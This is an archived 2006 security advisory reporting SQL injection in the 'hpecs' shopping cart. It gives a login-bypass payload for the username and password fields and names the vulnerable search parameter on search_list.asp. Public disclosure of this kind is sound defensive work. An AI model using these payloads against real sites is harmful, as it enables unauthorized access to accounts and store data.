hpecs.txt

2006-11-16T00:00:00
ID PACKETSTORM:52166
Type packetstorm
Reporter benjamin moss
Modified 2006-11-16T00:00:00

Description

                                        
                                            `vendor site:http://hpe.net/  
product:hpecs shopping cart  
bug:injection sql  
risk:high  
  
  
login bypass :  
username: 'or''='  
passwd: 'or''='  
  
injection sql (post) :  
  
http://site.com/search_list.asp  
variables:  
Hpecs_Find=maingroup&searchstring='[sql]   
( or just post your query in the search engine ... )  
  
laurent gaffié & benjamin mossé  
http://s-a-p.ca/  
contact: saps.audit@gmail.com  
`